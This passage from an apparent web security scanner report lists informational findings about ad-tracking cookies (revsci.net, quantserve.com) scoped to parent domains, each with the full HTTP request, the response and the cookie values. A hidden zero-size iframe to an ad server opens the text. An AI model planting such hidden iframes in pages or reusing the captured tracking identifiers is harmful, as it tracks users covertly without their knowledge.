<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999'width='0' height='0'></iframe>

9.26. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; rtc_Vpu9=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; udm_0=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; rsiPus_feb9="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 14:01:09 GMT

GIF89a.............!.......,...........D..;

9.27. http://pix04.revsci.net/G10937/a4/0/0/0.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G10937/a4/0/0/0.302

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G10937/a4/0/0/0.302?tgt=http%3A%2F%2Fib.adnxs.com%2Fseg%3Fmember%3D514%26add_code%3D%7Bsegs%7D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; 

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ib.adnxs.com/seg?member=514&add_code=
Content-Length: 0
Date: Wed, 06 Jul 2011 14:01:07 GMT


9.28. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K08784/b3/0/3/1008211/203785884.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/203785884.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252F%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; 

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jlBeHIMH/C1v6FY5PjO22rQpqLIRj7lzGDK0pZ5a28Qjg614UTo+UUZb5s27MU3p+k1fyDJMFC8UMYTHbX5oy7V/9AyP3MKtaUdhNOZLiDzifUwJ6G017VVI1pv3eQy/8vqbtJkyjk7nE4KE7l/wLZt8DhbakiEW/VLtFEXckivfAVqRuzLjZec6jzqKaqKrjFKfHSYNLNHdNVX11b+xXjbYwlDNyJv0Fhoh3zSBDAaKUDjNkPyWg082tNhETKy7tEFVMoqZ4uQwGoPaO/utnIBrsOkDHbwJWsvQGaGUzBhsCsTUS3GspLlv9PXwnuiXdyyzDdBLkO0mpRqHFg8ZjtJA1IYrzt9napRSvbPxXmagthUik25xORIWYKMM7HWh842q0BgXmYHsemlc/aTVfxqrc4qPByTJ1/04AbqT1ntuJN8Y2uTzuJL7+yhOY5PR6c6iO+wh5akL8lEX9k83bGIOi1VbGjYD104xeGlS2VbjzTa9xmTTzPgR4WxHTJ7rSM8NBbzW1HUX2RVATZ0oTIKIxS+0QrtvdM65TwP8es2F6hzh/35CSJ6tH8UW+bnd52pUZcMb0ML4RJKJeoi4STpyI+wRAv4qTNgQqrlgpxeLO6jE3LM1jGedmZzMbpa44eSz2wwCvt/eg8hvBNb0m9iWVuG7zkS6R6mjJHs5aC0GQaVlR3x7MrPAjqaWMiNPYdtPtZsbjVEz8ALgUQRikbtowMS6xzKwPAZe46dB7pUA25X2IyUW/OMLa+vBIGcp73PBb7SrYs=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
Set-Cookie: rtc_vsLf=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:08 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

9.29. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K08784/b3/0/3/1008211/223509117.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/223509117.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252Fabout.html%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Ftechflash.com%252F%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="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"; 
rsi_us_1000000="pUMV4j9DMIYVbY/ikx0KzFTj+FP87ZD9RDcPotrS7irqfu3qY4mFlBU4RjWfnjoBtdFs4WH3fJ6SXFZiS4a53zugCH5h+glQPB4sV4//RPT3TI3QN5T82ZUr/EpqQWf4RdnePtzNmGQEQI1D6tOTkfqk+GqQnQi8ZSCEdHfQHI8jIsrKKzwcxCWHgc0f5DJLLb7IRN11f/w+UvgpQsfP7GxBX1VXNiwtkuax2pbE2sMdZZ6ukKQGGhd6zImH+FwTxfJr3h/d58ejzinjY0Y8cCQnIIheka/NCb0ynwHx2Q9HlUftUEe+G8IP9BX9bwrU8+vYG3rcskqPsdoiTWJHWazmGKOyL+BtLxRTQKcggG6nDSHItI2lS4+kqYzKLIlyDDacwVi1Qz6Ynv1arcp3N4ANE70ZCYzt4MwYKV0nR45LNXVmpHW6j3pTpTB+Up1/bxv9LxVoD3G7J6V29zGBXC+ZYf7+Y+zAy/fmMg454372IY6WkhFI/0egVGf/kYE39SJUM5rTcW0Z7lmVNnaFsF27dHeDaQxXEx/cutg3scRto6ngyjpVnMSGKRvlJ+eu7Zn5V/aSgcXvuALUjSEuR7gssyupFlO0wLxymarhFpMK94VXjj5yaQlJ8MUFlCP/qq/Q1MjKTybRe6jEydbnMGIk5KQ+9EzCv/5AKql/SGwGhvGmK59b8mI0H/s59fcnAaYsTRAh/Gk1GeYHUgEDvSZsuQUTI78KkJXzq/pYbk6qPpLWSRfYlS6a4UnXidqrhhMwnIUtmQk83pnjGzweIe9ifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas48XslO7BtR/Lkh74WCTKmQ2TcR/80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe6ZToij8/lnbZLfV+uEDXOLuOPT+JdyEMvMsEn7HcvBF+lm6kNgTKN2N0+RLO2pzEjlrbHdcho1MyFF9RtXqkWiSYP1SK0Z1JpQawf1VOEyblQFx7TAFSHkDq5YarNx1BjiCNSpT4pkc8zWlMERLAj742CxFJcNA7+7bqXIMpeRazq3GjYvq1ZExQxa14EVX3zMvdLiL4537bQzTtImWwRFCeJp1vOWaNCtiBaCCjUkE2AoeBTuAe4c4yZkwslcIwpVDwPnAc3kKPZLY+Z993KEKoXrWe62waOFdM9UyBhhZ8eyiviPRdWN+n5QWZXB/ytQk/EE16yEod9zUfnImrZJQW9Ys8nMLoze9ggGLSwXkoCVW0jHGRYkBUzEn3w0mptRnwXBbU/Ng4L9wDqPV1VjFlj2eXdfBEd2SWiWEoWV6VePTqpTUUoOMH9nsKTy2BqAdM8+Ek6W3257M/WcT6RgFIYhPu9y3eoJOGdX0ulvPgicSTBr+v6691MMM3Rz/UjOBFtYVx3shMKNlsstRh3vd0jUAyZ6258m9TC3vzg4Mry01nPVr29HB6VUElrRvOKGL8L3qbFAhutUcO/UxXT8a1f+Bhn0sp4SoJzDjEp2cmrA6sxh0SZm33XoaXmH3bmvhnpJX401vQl6DH1RWGWhl6f3idkGtOok/Mk4AKZw1ruTMAbId9Eat5e7LdG4+YIdz+UghA39ntHpNv3FgpMH0DEwDClJszcizVL1xoXNjpyDlYFVaZN8VWoDHe8ueyeVUuvLZwNIkyVi6GZHodr4jdrYvXA+PsERFXEqNg49BAC8jJ6+hf3tGtMtpIavStGyayEm8pmgXnw2/dXLA58vkqaROPe/EhQVfRLBrpPtrP5LkdoyM9GtJD4W6ykqZgFFE6WIfcG3GJ03m55lU7HlWlxuXMSDj9oTnVA9DT33GFTIAc+OmYkGrvWKeQflFuagdRs4X42I5wKzsz9acFXUpmJvMuZy5z5LO2t2s+5TmrnpVq0KmuWhwNOQaYsN+7Romyg47j4n
SP+0fpyhJKll1yPjWD9tHBkY+R0MUxDV9WvcFQ=="; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rtc_v0Na=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; rsi_segs_1000000=pUPF4jOheXIMH/C1v6FY5BD9CU6du67BSgvgzGDKayViGy3JIntSYSCogy2dpq+vTNY9h2lFiAhEBsltMJbTJ9ivq7PTxfNWHGNAsDuCMaDOsTL2zPjGJ+CmLyT1fIx2UEmQqSaRlxwJf87lS0DSpS34ET1l5eDtMmmNUq38ritDzt0qMIT37KJxcr4I926kXGcBv1f+PlRy1YRo+0j9e1w838xgs4qtMuHJ90XLG6RbwlkrvkToOceVQTaOiUZU/rxSy5Qu6HXjzsXVOVmNAWWASVamxCEkN1L6ihWFC8ws5XARoRY9wzIAMfg9/1loHEfe1+HXBkwmZBbpcxg51RGTU74BDldjx2+dF0Ma8d2aV97JgPzw21QEGFaJMpQxIa8qF7TyvyiIDfGdeKQGuAQ/OTDCJg4o2QVFNzKdUEvgGjAOEysGaiRP3qVv7QVIJoh+/u0LWksU4W2M2y8ypXUrK0K3ItRF/Iczv8l1mcBHEcZNvPgAHmNJ29T7pHeeR8oFKTQNfPyQmLW2aaz3YNVElfNa5z9QG4akMouVMFXDD0rhvkqtZ8sYH5/H7N49fKrdemzWSUrYrcbYHCQv+GTQOTlvJ3I7uggVSAxHoD70bb3St51P9Dxv6oXHekK5/IYIf28uwGtRcld8yrPBrHAg34wtHGRhvpl6dHoJZo/vbbsKtSnDL3Zz19C1wHWlV8uTdIjd90gL5yoZRDt6LeZpFQudSu0zSwA9IvWVADSBfsZ6S0NDSfgYUcFw8jp9Tl70PII=; rtc_SA26=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
Set-Cookie: rtc_N0S3=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

9.30. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1794506331;fpan=0;fpa=P0-399196261-1309960828609;ns=0;url=http%3A%2F%2Ftechflash.com%2Fabout.html;ref=http%3A%2F%2Ftechflash.com%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1309960851219;tzo=300;a=p-b1m9DYkJHhIgg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
